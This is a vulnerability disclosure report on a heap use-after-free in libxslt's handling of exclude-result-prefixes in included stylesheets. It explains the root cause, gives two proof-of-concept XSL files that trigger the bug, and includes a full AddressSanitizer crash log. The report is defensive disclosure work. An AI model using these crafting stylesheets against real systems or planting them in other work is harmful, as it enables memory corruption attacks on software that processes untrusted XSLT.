There is a use-after-free issue in libxslt (read on a namespace URL stored in exclPrefixTab). The issue was reproduced on the latest Git version. The proof of concept and ASAN log are provided at the end of the report.

Details / root cause:

When processing a stylesheet include, xsltParseStylesheetProcess gets called. xsltParseStylesheetProcess first calls xsltParseStylesheetExcludePrefix, which parses the exclude-result-prefixes attribute. For every prefix found in exclude-result-prefixes, a *pointer* to the corresponding namespace URL string gets stored in the exclPrefixTab table.

Later, in xsltParseStylesheetProcess, if the root element of the included stylesheet is *not* a "stylesheet" or a "transform" element, but has a valid xsl:version attribute, xsltParseTemplateContent gets called. xsltParseTemplateContent deletes some xml nodes, in particular xsl:text element nodes. Freeing the node also frees the namespace definitions defined on it. If xsl:text is also the root element of the included stylesheet, then namespace URLs that were previously saved in exclPrefixTab will also get freed and the pointers inside the exclPrefixTab will be left dangling.

Later, in xsltGetInheritedNsList, when the pointers inside exclPrefixTab get referenced, this will access freed memory.


PoC (main.xsl):

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:include href="include.xsl"></xsl:include>
<xsl:template xmlns:ns1="http://www.w3.org/url1"></xsl:template>
</xsl:stylesheet>

PoC (include.xsl):

<?xml version="1.0" encoding="UTF-8"?>
<xsl:text xsl:version="1.1" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:foo="http://www.w3.org/foo"  xsl:exclude-result-prefixes="foo"></xsl:text>

ASAN log:

$ ./libxslt/xsltproc main.xsl
=================================================================
==2472794==ERROR: AddressSanitizer: heap-use-after-free on address 0x503000000d60 at pc 0x55cb06b54c4c bp 0x7fffc4573840 sp 0x7fffc4573838
READ of size 1 at 0x503000000d60 thread T0
    #0 0x55cb06b54c4b in xmlStrEqual /usr/local/google/home/ifratric/p0/xsl/libxml2/xmlstring.c:178:24
    #1 0x55cb0673db0e in xsltGetInheritedNsList /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:1130:11
    #2 0x55cb0673b2aa in xsltParseStylesheetTemplate /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:5409:5
    #3 0x55cb06726a2c in xsltParseStylesheetTop /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:6232:6
    #4 0x55cb0671b10a in xsltParseStylesheetProcess /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:6488:2
    #5 0x55cb06727a60 in xsltParseStylesheetUser /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:6696:9
    #6 0x55cb06727373 in xsltParseStylesheetImportedDoc /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:6566:9
    #7 0x55cb06729981 in xsltParseStylesheetDoc /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:6739:12
    #8 0x55cb0656fe28 in main /usr/local/google/home/ifratric/p0/xsl/libxslt/xsltproc/xsltproc.c:850:9
    #9 0x7f54b30c3c89 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #10 0x7f54b30c3d44 in __libc_start_main csu/../csu/libc-start.c:360:3
    #11 0x55cb064905c0 in _start (/usr/local/google/home/ifratric/p0/xsl/build/libxslt/xsltproc+0x4ef5c0) (BuildId: 4d17f84c82cfb94ac241b62704fcb021821a19a9)

0x503000000d60 is located 0 bytes inside of 22-byte region [0x503000000d60,0x503000000d76)
freed by thread T0 here:
    #0 0x55cb0652af6a in free (/usr/local/google/home/ifratric/p0/xsl/build/libxslt/xsltproc+0x589f6a) (BuildId: 4d17f84c82cfb94ac241b62704fcb021821a19a9)
    #1 0x55cb06a0d875 in xmlFreeNs /usr/local/google/home/ifratric/p0/xsl/libxml2/tree.c:772:28
    #2 0x55cb06a0de9c in xmlFreeNsList /usr/local/google/home/ifratric/p0/xsl/libxml2/tree.c:791:9
    #3 0x55cb06a15462 in xmlFreeNode /usr/local/google/home/ifratric/p0/xsl/libxml2/tree.c:3710:13
    #4 0x55cb067196c6 in xsltParseTemplateContent /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:5074:2
    #5 0x55cb0671b8a5 in xsltParseStylesheetProcess /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:6531:2
    #6 0x55cb065ea3b5 in xsltParseStylesheetInclude /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/imports.c:265:14
    #7 0x55cb06725edf in xsltParseStylesheetTop /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:6210:10
    #8 0x55cb0671b10a in xsltParseStylesheetProcess /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:6488:2
    #9 0x55cb06727a60 in xsltParseStylesheetUser /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:6696:9
    #10 0x55cb06727373 in xsltParseStylesheetImportedDoc /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:6566:9
    #11 0x55cb06729981 in xsltParseStylesheetDoc /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:6739:12
    #12 0x55cb0656fe28 in main /usr/local/google/home/ifratric/p0/xsl/libxslt/xsltproc/xsltproc.c:850:9
    #13 0x7f54b30c3c89 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

previously allocated by thread T0 here:
    #0 0x55cb0652b212 in __interceptor_malloc (/usr/local/google/home/ifratric/p0/xsl/build/libxslt/xsltproc+0x58a212) (BuildId: 4d17f84c82cfb94ac241b62704fcb021821a19a9)
    #1 0x55cb06b540be in xmlStrndup /usr/local/google/home/ifratric/p0/xsl/libxml2/xmlstring.c:57:11
    #2 0x55cb06b54329 in xmlStrdup /usr/local/google/home/ifratric/p0/xsl/libxml2/xmlstring.c:82:12
    #3 0x55cb06a0c706 in xmlNewNs /usr/local/google/home/ifratric/p0/xsl/libxml2/tree.c:704:14
    #4 0x55cb069de3c9 in xmlSAX2StartElementNs /usr/local/google/home/ifratric/p0/xsl/libxml2/SAX2.c:2212:7
    #5 0x55cb06983cd0 in xmlParseStartTag2 /usr/local/google/home/ifratric/p0/xsl/libxml2/parser.c:9610:6
    #6 0x55cb0690b7e4 in xmlParseElementStart /usr/local/google/home/ifratric/p0/xsl/libxml2/parser.c:10010:16
    #7 0x55cb0690988b in xmlParseElement /usr/local/google/home/ifratric/p0/xsl/libxml2/parser.c:9945:9
    #8 0x55cb06925fdd in xmlParseDocument /usr/local/google/home/ifratric/p0/xsl/libxml2/parser.c:10764:2
    #9 0x55cb069566ae in xmlCtxtParseDocument /usr/local/google/home/ifratric/p0/xsl/libxml2/parser.c:13836:5
    #10 0x55cb0677f952 in xsltDocDefaultLoaderFunc /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/documents.c:92:11
    #11 0x55cb06782862 in xsltLoadStyleDocument /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/documents.c:400:11
    #12 0x55cb065e9ad5 in xsltParseStylesheetInclude /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/imports.c:236:15
    #13 0x55cb06725edf in xsltParseStylesheetTop /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:6210:10
    #14 0x55cb0671b10a in xsltParseStylesheetProcess /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:6488:2
    #15 0x55cb06727a60 in xsltParseStylesheetUser /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:6696:9
    #16 0x55cb06727373 in xsltParseStylesheetImportedDoc /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:6566:9
    #17 0x55cb06729981 in xsltParseStylesheetDoc /usr/local/google/home/ifratric/p0/xsl/libxslt/libxslt/xslt.c:6739:12
    #18 0x55cb0656fe28 in main /usr/local/google/home/ifratric/p0/xsl/libxslt/xsltproc/xsltproc.c:850:9
    #19 0x7f54b30c3c89 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

SUMMARY: AddressSanitizer: heap-use-after-free /usr/local/google/home/ifratric/p0/xsl/libxml2/xmlstring.c:178:24 in xmlStrEqual
Shadow bytes around the buggy address:
  0x503000000a80: fa fa 00 00 00 01 fa fa 00 00 00 00 fa fa 00 00
  0x503000000b00: 00 01 fa fa 00 00 00 01 fa fa 00 00 00 01 fa fa
  0x503000000b80: fd fd fd fa fa fa 00 00 07 fa fa fa 00 00 00 00
  0x503000000c00: fa fa 00 00 01 fa fa fa 00 00 00 00 fa fa 00 00
  0x503000000c80: 05 fa fa fa 00 00 00 01 fa fa 00 00 05 fa fa fa
=>0x503000000d00: 00 00 00 01 fa fa fd fd fd fa fa fa[fd]fd fd fa
  0x503000000d80: fa fa 00 00 00 00 fa fa fa fa fa fa fa fa fa fa
  0x503000000e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x503000000e80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x503000000f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x503000000f80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==2472794==ABORTING


This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2025-03-03.

For more details, see the Project Zero vulnerability disclosure policy:
https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-
policy.html


Related CVE Number: CVE-2024-55549.

Credit: Ivan Fratric